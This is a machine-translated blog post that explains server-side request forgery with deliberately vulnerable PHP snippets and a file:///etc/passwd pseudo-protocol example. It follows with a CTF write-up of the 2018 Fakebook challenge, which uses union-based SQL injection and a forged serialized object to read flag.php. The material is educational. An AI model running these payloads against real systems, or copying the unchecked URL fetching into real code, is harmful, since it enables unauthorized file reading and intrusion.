About SSRF Loophole （ Server side forgery ） Reference resources SSRF Vulnerability principle attack and defense ( Super detailed summary )_ Zero tap code blog -CSDN Blog _ssrf Loophole defense

SSRF(Server-Side Request Forgery: Server side Request Forgery ) It is a security vulnerability that is constructed by the attacker to form a request initiated by the server .

In general ,SSRF The target of the attack is from Extranet Inaccessible internal system .（ Because it is initiated by the server , So it can request to the internal system connected to it and isolated from the external network ）

Four 、 produce SSRF Loophole function

SSRF The attack may exist in applications written in any language , Next, we will give an example php There may be SSRF Loophole function .

1、file_get_contents:

The following code uses file_get_contents Function from user specified url Get photo . Then save it on the hard disk with a random file name , And show the user .

<?php
if (isset($_POST['url'])) 
{ 
$content = file_get_contents($_POST['url']); 
$filename ='./images/'.rand().';img1.jpg'; 
file_put_contents($filename, $content); 
echo $_POST['url']; 
$img = "<img src=\"".$filename."\"/>"; 
} 
echo $img; 
?>

2、sockopen():

The following code USES fsockopen Function implementation to obtain the user specified url The data of （ Documents or html）. This function uses socket Establish with the server tcp Connect , Transmit raw data .

<?php 
function GetFile($host,$port,$link) 
{ 
$fp = fsockopen($host, intval($port), $errno, $errstr, 30); 
if (!$fp) { 
echo "$errstr (error number $errno) \n"; 
} else { 
$out = "GET $link HTTP/1.1\r\n"; 
$out .= "Host: $host\r\n"; 
$out .= "Connection: Close\r\n\r\n"; 
$out .= "\r\n"; 
fwrite($fp, $out); 
$contents=''; 
while (!feof($fp)) { 
$contents.= fgets($fp, 1024); 
} 
fclose($fp); 
return $contents; 
} 
}
?>

3、curl_exec():

cURL This is another very common implementation , It passes through PHP get data . file / The data is downloaded and stored in “curled” In the disk under the folder , A random number and “.txt” File extension .

<?php 
if (isset($_POST['url']))
{
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);
 
$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result); 
echo $result;
}
?>

matters needing attention

 In general PHP It won't turn on fopen Of gopher wrapper
file_get_contents Of gopher The agreement cannot URL code 
file_get_contents About Gopher Of 302 The jump will appear bug, Leading to the failure of utilization 
curl/libcurl 7.43  On gopher The agreement exists bug(%00 truncation )  After testing 7.49  You can use 
curl_exec()  Jump is not tracked by default ,
file_get_contents() file_get_contents Support php://input agreement 

5、 ... and 、SSRF in URL Pseudo protocol

When we find out SSRF After the leak , The first thing to do is to test all available URL Fake protocol

file:/// Get the file content from the file system , Such as ,file:///etc/passwd
dict:// Dictionary server protocol , ACCESS Dictionary resources , Such as ,dict:///ip:6739/info：
sftp:// SSH File transfer protocol or secure file transfer protocol
ldap:// Lightweight directory access protocol
tftp:// Simple file transfer protocol
gopher:// Distributed document delivery service , You can use gopherus Generate payload

  The above knowledge points come from the chapter header reference ;

from facebook Start with this example ：

Reference resources ：[ WANGDING cup 2018]Fakebook_ Programmer's little chicken blog -CSDN Blog

[ WANGDING cup 2018]Fakebook（ssrf Loophole ）_ Tian Wen _Herbert555 The blog of -CSDN Blog

  First register and then log in to find the user we registered , Click in ;

And found that URL in The variable of no, Try sql Inject ：

Use comments to bypass ：union/**/select

?no=-1 union/**/select 1,database(),3,4# （ Database search ）  Find out  'fakebook'

　　?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'# （ Look up the name of the table ）  Find out 'users'

?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#    ( Check field )    Field name 'no,username,data'

Joint injection here , Spaces are filtered , Just use /**/ Instead of , A series of routine findings ： Serialized things ：

 2. Directory scanning , Found to have robots.txt, also flag.php;

open robots, You can find the source code package ;

Analysis of the source code ：

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

stay get It is found that curl_exec Associated with the ssrf , combining flag.php, Use file： agreement , And open a user's source code to see data Encrypted webpage of segment ;

So will blog Change it to file:///var/www/html/flag.php

You can deserialize , You can also directly change the serialization results found before ： Change the length to 29,blog Just change it ：

structure ：

?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

What I don't understand here is , Why is it 4 Position plus serialization ？？

Then check the source code ,data Positional base64 Just encode and decode ;

There is another unexpected method , Namely load_file(); Specific reference ;